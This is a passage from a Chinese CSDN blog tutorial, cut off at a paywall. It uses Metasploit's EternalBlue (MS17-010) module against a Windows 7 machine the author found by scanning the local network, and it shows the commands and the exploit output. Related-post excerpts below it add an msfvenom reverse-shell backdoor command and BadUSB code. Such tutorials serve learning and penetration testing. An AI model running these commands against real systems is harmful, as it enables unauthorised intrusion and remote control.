Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件

已于 2023-04-30 19:23:39 修改
阅读量2.7k 收藏 16
点赞数 5
文章标签: 安全 网络 运维
于 2023-04-30 14:15:09 首次发布
Neatsuki-king
本文链接:https://blog.csdn.net/m0_54471074/article/details/130447443
版权
本文介绍了如何通过msfconsole使用永恒之蓝漏洞入侵Win7系统,包括信息收集、启动msfconsole搜索漏洞、设置参数进行入侵,以及成功后如何上传并执行文件。在入侵过程中,作者演示了从扫描目标445端口到成功获得系统控制权的全过程,并尝试在系统中运行DEV-C++,虽然遇到错误,但展示了远程执行文件的可行性。
摘要由CSDN通过智能技术生成

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

前言

提示:这里可以添加本文要记录的大概内容:

我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。

提示:以下是本篇文章正文内容,下面案例可供参考

一、信息收集

第一步,信息收集
在这里插入图片描述
先查找自己的IP地址以方便查找同局域网的设备
在这里插入图片描述
然后使用nmap -O以一个一个扫
看我找到了什么
在这里插入图片描述
找到了,正好开放445端口
在这里插入图片描述

二、开始入侵

1.启动msfconsole

msfconsole

在这里插入图片描述
启动成功了,搜索ms漏洞

2.搜索漏洞

search ms17_010

然后扔给我们这些东西,以前用过的知道该使用哪个
在这里插入图片描述
输入:

use exploit/windows/smb/ms17_010_eternalblue

在这里插入图片描述
看到这个样子就是成功了,然后我们执行下一步,查找要设置的参数,输入options
在这里插入图片描述
yes是必须要设置的,no可以弄也可以不弄,我懒得弄了,
在这里插入图片描述
IP一定要设为目标的IP地址,然后我们再options
在这里插入图片描述
已经都准备好了,可以进行入侵了,输入

run

在这里插入图片描述

[*] Started reverse TCP handler on 192.168.22.13:4444

这串代码讲的是开始反向TCP监听,监听本机的IP和端口

192.168.22.196:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.22.196:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600
最低0.47元/天 解锁文章
「已注销」
关注
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝Win7勒索加密
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这篇基础性文章对您有所帮助。
永恒之蓝windows7 下的渗透测试
舞动的獾
10-14 1395
漏洞介绍 永恒之蓝是影子经纪人黑客组织攻破美国NSA黑客组织后公布的漏洞工具之一。 2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大...
通过msfconsole获取windows7的控制
weixin_43893278的博客
08-30 995
msfconsole获取windows7的控制 此处我们使用vmware软件来模拟,两个主机分别为windows7和kali主机,注意两个主机的网络适配器要接到同一个网口,否则ping不通; windows7的ip为10.1.1.1/24,kali的ip为10.1.1.2/24 (1)打开msfconsolemsfconsole (2)搜索漏洞; search ms17-010 (1)使用漏洞; use exploit/windows/smb/ms17_010_eternalblue (1)显示
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
MSFconsole(msf渗透神器) Windows 版本
最新发布
gitblog_09782的博客
09-07 511
MSFconsole(msf渗透神器) Windows 版本 metasploitframework-latest.zip项目地址:https://gitcode.com/open-source-toolkit/e92d4 简介 本仓库提供了一个在 Windows 平台上可用的 MSFconsole(Metasploit Framework 控制台)版本。MSFconsole 是 Metaspl...
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 3154
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
msf上传文件到服务器,利用MSF技巧进入服务器
weixin_29209825的博客
08-12 1837
原标题:利用MSF技巧进入服务器首先需要一台公网的机器,这是留着方便以后转发或者反弹用的.1.生成payload的方式msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=2333 -f exe -o 1234.exe 之后把后门复制出来上传到webshell 推荐不使用exe后缀 因为一来会被杀 二来exe通常被禁止运行改...
使用MSF渗透攻击win7主机并远程执行命令
weixin_43991459的博客
06-15 3249
Win7 网络连接检查命令: Linux下: auxiliary是辅助模块用命令找寻关于ms17_010 的可运行模块用 指令,调用模块进行扫描,侦察靶机是否具备被攻击的条件通过 查看需要配置的参数,并用set进行配置,后面显示yes的必须设置若为【-】 以上说明已经打了改漏洞的补丁 刚才这个过程,是通过辅助模块探测目标主机的系统是否存在该漏洞。 下图的目标主机存在该漏洞 设置完成后出现【+】表示可以入侵 水印遮挡内容为: 开始加载使用入侵模块,进行入侵使用 指令查看可以使用的攻击载荷 若失败将靶机
利用msf入侵电脑
weixin_44761350的博客
05-25 1283
msf
MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
热门推荐
linxaiomo
02-20 1万+
漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9 攻击机:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期准备工作:由于kali是64位,如果windows 7 是32 位,所以我们得安装wine3...
使用 msf 渗透攻击 win7 主机并远程执行命令
枫梓林のBlog
04-21 3841
使用 msf 渗透攻击 win7 主机并远程执行命令 文章目录使用 msf 渗透攻击 win7 主机并远程执行命令一、扫描局域网存活的主机并判断是否是目标主机1.1 使用 netdiscover 判断该局域网内 IP网段1.2 使用 nmap 扫描 该网段 判断目标主机二、通过Nessus 扫描该主机漏洞三、通过msf模块获取win7主机远程shell总结 实验环境 Win7 旗舰版 SP1 -64 位 kali Linux 2019.1a Nessus 一、扫描局域网存活的主机并判断是否是目标主机
msf渗透win7
qq_61988806的博客
12-17 1694
环境设置 攻击机 kali 靶机 ip 192.168.1.110 题目 1.得到靶机最高权限的用户的登录密码 2.找到桌面下1文件夹中的1.txt 3.得到靶机的dns地址
badusb攻击windows10(msfconsole版)
algae
04-27 1474
准备badusbArduino下载软件点击下载运行软件TIM截图20190305105048.png在工具菜单中 选择,选择badusb的端口和开发版。TIM截图20190304122136.png注入代码windows10系统#include <Keyboard.h> void setup() { Keyboard.begin();//开始...
Windows上安装Metasploit-(msfconsole
m0_73135216的博客
05-12 2821
平时使用metasploit一般是在kali里面,有时候使用非常的麻烦,其实Metasploit也是支持Windows的,关于很多metasploit的方法,作者觉得有点小麻烦,这里给大家带来一种最简单的方法。任务二 安装metasploit (步骤非常简单)看到这一步说明安装成功了,安装过程比较缓慢,请不要安装到C盘!这里已经运行成功了,看到别的文章要设置环境变量,这里比较简单,就没有做过多的操作,如果安装有问题,就去设置环境变量,也有可能是因为metasploit版本问题和系统版本问题。
msf上传文件到服务器,Metasploit 文件包含漏洞
weixin_36213143的博客
08-12 1086
远程文件包含(RFI)和本地文件包含(LFI)是通常在编写不好的Web应用程序中发现的漏洞。当Web应用程序允许用户将输入提交到文件或将文件上载到服务器时,会发生这些漏洞。LFI漏洞允许攻击者读取(有时执行)受害机器上的文件。这可能非常危险,因为如果Web服务器配置错误并以高权限运行,攻击者可能会访问敏感信息。如果攻击者能够通过其他方式在Web服务器上放置代码,那么他们可能能够执行任意命令。RFI...
kail使用msf工具利用永恒之蓝漏洞攻击win7
m0_73948163的博客
12-30 924
show options 另外Required为yes的也需要设置。我们输入shell就可以进入到win7的cmd。最后使用creds_all命令抓取明文密码。接下来我们可以查看需要设置的IP地址和端口。这上面有三个可以利用的漏洞我们选择第一个。其实还有很多可以执行的操作就不一一列举了。还可以使用screenshot命令截屏。还可以使用mimkatz抓取明文密码。除此之外还需要设置payload。先使用hashdump抓取密码。这是几个渗透后可以使用的命令。我们查看win7的IP。设置完成后就进行攻击。
kail利用msf工具对ms11-003漏洞入侵渗透Win7
qq_50854662的博客
05-26 2164
前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.29.134 步骤: 1、在kali里面打开metasploit漏洞利用框架 2、搜索ms11-003漏洞利用模块 3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import 4、设置payload set pay...
msfconsole扫描永恒之蓝漏洞
09-06
你可以使用 Metasploit 框架中的 `msfconsole` 命令进行永恒之蓝漏洞的扫描。请确保你已经正确安装了 Metasploit 框架,并且了解其基本用法。 在打开的终端中输入 `msfconsole` 来启动 Metasploit 框架控制台。然后,你可以使用以下命令来扫描永恒之蓝漏洞: ``` use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS <目标IP地址或IP范围> run ``` 在上面的命令中,你需要将 `<目标IP地址或IP范围>` 替换为你要扫描的目标设备的IP地址或IP范围。 执行 `run` 命令后,Metasploit 将自动扫描目标设备并报告结果。 请注意,仅在合法授权和合规测试范围内使用这些工具。未经授权的扫描可能违反法律规定。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

「已注销」

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值